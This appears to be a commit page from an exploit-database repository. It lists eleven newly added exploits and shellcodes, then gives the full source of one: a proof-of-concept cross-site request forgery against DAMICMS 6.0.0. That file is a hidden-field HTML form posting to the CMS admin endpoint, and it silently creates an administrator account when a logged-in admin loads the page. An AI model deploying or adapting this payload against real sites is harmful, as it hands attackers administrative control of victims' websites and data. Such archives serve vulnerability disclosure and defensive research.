e8a3702c6c
11 changes to exploits/shellcodes Core FTP LE 2.2 - Buffer Overflow (PoC) SIPp 3.6 - Local Buffer Overflow (PoC) Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC) Enhanced Mitigation Experience Toolkit (EMET) - XML External Entity Injection FTPShell client 6.70 (Enterprise edition) - Stack Buffer Overflow (Metasploit) Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit) Geutebruck 5.02024 G-Cam/EFD-2250 - Remote Command Execution (Metasploit) Geutebruck 5.02024 G-Cam/EFD-2250 - 'testaction.cgi' Remote Command Execution (Metasploit) Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit) VMware NSX SD-WAN Edge < 3.1.2 - Command Injection DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin) Dolibarr ERP CRM < 7.0.3 - PHP Code Injection Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)
25 lines
No EOL
896 B
HTML
25 lines
No EOL
896 B
HTML
<!--
|
|
# Exploit Title: DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)
|
|
# Date: 2018-06-30
|
|
# Exploit Author: bay0net
|
|
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9248562.html
|
|
# Software Link: https://www.damicms.com/Down#
|
|
# Version: DAMICMS_V6.0.0
|
|
# CVE : N/A
|
|
|
|
# DamiCMS v6.0.0 allows CSRF via admin.php?s=/Admin/doadd to add an administrator account.
|
|
# The payload for attack is as follows.
|
|
-->
|
|
|
|
<html>
|
|
<body>
|
|
<script>history.pushState('', '', '/')</script>
|
|
<form action="http://Target/dami/admin.php?s=/Admin/doadd" method="POST">
|
|
<input type="hidden" name="username" value="test22" />
|
|
<input type="hidden" name="password" value="test22" />
|
|
<input type="hidden" name="role_id" value="1" />
|
|
<input type="hidden" name="Submit" value="添加" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html> |